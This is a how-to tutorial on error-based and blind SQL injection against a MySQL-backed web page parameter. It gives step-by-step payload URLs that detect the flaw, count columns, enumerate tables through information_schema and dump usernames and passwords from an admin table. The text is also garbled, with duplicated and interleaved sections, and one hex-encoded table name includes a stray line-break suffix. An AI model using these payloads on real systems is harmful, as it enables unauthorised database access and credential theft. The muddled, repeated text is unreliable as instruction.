SQL Injection:
SQL injection is a code injection technique, used to attack data-driven applications in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
Types :
[-]Error based
[-]Blind based
[1]Error based:
In error based we used error through-ed by database to preform injection.
Let me show an example:
Suppose we have a web app that has a database on the back end and it’s fetching data from it.
Like this website: www.website.com/index.php?id=84
?id=84 means it’s fetching something with the id 84 from a database and this is our way to communicate with the database.
So let’s go forward with these steps…
[-]Blind based
[1]Error based:
In error based we used error through-ed by database to preform injection.
Let me show an example:
Suppose we have a web app that has a database on the back end and it’s fetching data from it.
Like this website: www.website.com/index.php?id=84
?id=84 means it’s fetching something with the id 84 from a database and this is our way to communicate with the database.
So let’s go forward with these steps…
(1) Finding if it’s vulnerable.
Put a single quote at the end: www.website.com/index.php?id=84′
If you receive an error like: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use.” Or something like that, it means that the web app is vulnerable to SQL injection.
What’s so good about getting this error message? The good thing is that we’re able to get errors from the database.
(2) Joining queries.
Now, for joining queries put –+ at end like this: www.website.com/index.php?id=84′ –+
And, between this, we’ll execute our query.
(3) Find the number of columns.
For this, we use order by or group by clauses to find a number of columns. But, there are two possibilities: do we have to leave our single quote( ‘ ) in here or do we have to remove it?
How will I know?
Simple…keep the tip below in mind:
Tip:
If you run the order clause “correctly” – meaning with more columns in the database, you’ll see an error like this “unknown column ‘100’ in ‘order clause'”
With this, we now know we have to remove the ( ‘ ) or not
Run the order clause with a guess of the max number or columns like this: www.website.com/index.php?id=84′ order by 100000000 –+
Do we get an error like this?
“unknown column ‘100000000’ in ‘order clause'”
If no, then it means that we have to remove our ( ‘ ) from the link – otherwise it should be here.
We’ll keep on guessing the numbers of columns randomly. Dude, how will I know that I’ve guessed the right number of columns??
Simple.
-if you exceed it, the database gives and error like “unknown column ‘100’ in ‘order clause'”
-if you are below it, you’ll see an error like “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use.'”
– if you’re on spot, then there’s no error
Suppose:
1-www.website.com/index.php?id=84’ order by 100 –+
Error: “unknown column ‘100 in ‘order clause'”
2-www.website.com/index.php?id=84′ order by 8–+
Error : “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”
This means that number of columns are below 100 and greater then 8
We try:
2-www.website.com/index.php?id=84’ order by 10 –+
No error?? Bingo. This is the number we wanted. We have 10 columns.
(4) Finding vulnerable column.
We have to find out by which column we can print information. For that, we use union select. We’ll do union select of 10 columns like this:
www.website.com/index.php?id=84′ union select 1,2,3,4,5,6,7,8,9,10 –+
The vulnerable column will be printed on the web app (eg: if 3 ,6 ,9 are vulnerable they’ll be printed on the web app. You can use any of them to print data; you can even use all of them.)
If you don’t get anything printed out – behind the ID number, some column name is hidden behind some content: www.website.com/index.php?id=-84′ union select 1,2,3,4,5,6,7,8,9,10 –+
Now that we’ve found vulnerable columns, we’ll use them to print info from database.
(5) Fetching data
Let’s use vulnerable column 3 to print the database name: www.website.com/index.php?id=84′ union select 1,2,database(),4,5,6,7,8,9,10 –+
You can use other functions, too – like user() to print user data and version() to print the version of database.
Let’s use vulnerable column 6 to print the table name’s in database:
www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()–+
Suppose we got three tables:
admin, users, pages
Let’s use vulnerable column 6 to print column names from the admin table. For this, we have to convert the table name to hex first, then put it after table_name=(hexed table name here):
Suppose we got three tables:
admin, users, pages
Let’s use vulnerable column 6 to print column names from the admin table. For this, we have to convert the table name to hex first, then put it after table_name=(hexed table name here):
www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a–+
Suppose we got following columns:
user, pass
We can print data from them like: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin–+
[2] Blind based:
There is no data printed on the web app by applying ( ‘ ) at the end of the URL. So, how can I know that it’s also vulnerable?
Easy.
If you apply ( ‘ ) at the end of the URL and some text, object, picture – if anything got missed, then it’svulnerable to blind based injection.
(1) Finding if it’s vulnerable.
Put a single quote at the end: www.website.com/index.php?id=84′
Things got missed? This means the web app is vulnerable to blind based SQL injection
Suppose we got following columns:
user, pass
We can print data from them like: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin–+
[2] Blind based:
There is no data printed on the web app by applying ( ‘ ) at the end of the URL. So, how can I know that it’s also vulnerable?
Easy.
If you apply ( ‘ ) at the end of the URL and some text, object, picture – if anything got missed, then it’svulnerable to blind based injection.
(1) Finding if it’s vulnerable.
Put a single quote at the end: www.website.com/index.php?id=84′
Things got missed? This means the web app is vulnerable to blind based SQL injection
(2) Joining queries.
For joining queries, put –+ at end like that
www.website.com/index.php?id=84′ –+
And between this, we’ll execute our query.
(3) Finding the number of columns.
For this, we use order by or group by clause to find the number of columns.
There are two possibilities: do we have to leave our single quote ( ‘ ) in here or should we remove it?
Tip : if putting –+
www.website.com/index.php?id=84′ –+
Brings things back to normal, meaning it returns all content, then it means we need (‘) – otherwise remove it.
“unknown column ‘100’ in ‘order clause'”
We’ll know if we have to remove ( ‘ ) or not.
Run the order clause with guess of max number or columns. We’ll keep on guessing the numbers of columns randomly. How will I know that I guessed the right number of columns?
– if you exceed, the content is missing
– if you’re below, the content is missing
– if you’re on spot, then no content is missing
Let’s take a look…
1-www.website.com/index.php?id=84′ order by 100 –+
*Content is missing
it means number of columns are below
2-www.website.com/index.php?id=84′ order by 8–+
*Content is missing
It means that number of columns are below 100 and greater then 8
Try:
2-www.website.com/index.php?id=84′ order by 10 –+
N0 content is missing? This is the number we wanted. We have 10 columns.
(4) Finding vulnerable columns
We have to find out by which column we can print information.
As above, we use union select: www.website.com/index.php?id=84′ union select 1,2,3,4,5,6,7,8,9,10 –+
The vulnerable column will be printed on the web app (eg: if 3 ,6 ,9 are vulnerable, they will be printed on the web app. You can use any or all of them.)
(5) Fetching data
Let’s use vulnerable column 3 to print the database name:
www.website.com/index.php?id=84′ union select 1,2,database(),4,5,6,7,8,9,10 –+
Let’s usecolumn 6 to print table name’s in database: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()–+
If we got three tables:
admin, users, pages
Let’s use column 6 to print column name’s from the admin table admin. We have to convert the table name to hex first then put it after table_name=(hexed table name here).
www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a–+
Suppose, we got following columns:
user, pass
We can print data from them like: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin–+
1-www.website.com/index.php?id=84′ order by 100 –+
*Content is missing
it means number of columns are below
2-www.website.com/index.php?id=84′ order by 8–+
*Content is missing
It means that number of columns are below 100 and greater then 8
Try:
2-www.website.com/index.php?id=84′ order by 10 –+
N0 content is missing? This is the number we wanted. We have 10 columns.
(4) Finding vulnerable columns
We have to find out by which column we can print information.
As above, we use union select: www.website.com/index.php?id=84′ union select 1,2,3,4,5,6,7,8,9,10 –+
The vulnerable column will be printed on the web app (eg: if 3 ,6 ,9 are vulnerable, they will be printed on the web app. You can use any or all of them.)
(5) Fetching data
Let’s use vulnerable column 3 to print the database name:
www.website.com/index.php?id=84′ union select 1,2,database(),4,5,6,7,8,9,10 –+
Let’s usecolumn 6 to print table name’s in database: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_Schema.tables where table_Schema=database()–+
If we got three tables:
admin, users, pages
Let’s use column 6 to print column name’s from the admin table admin. We have to convert the table name to hex first then put it after table_name=(hexed table name here).
www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(column_name),7,8,9,10 from information_Schema.columns where table_name=0x61646d696e0d0a–+
Suppose, we got following columns:
user, pass
We can print data from them like: www.website.com/index.php?id=84′ union select 1,2,3,4,5,group_concat(user, pass),7,8,9,10 from admin–+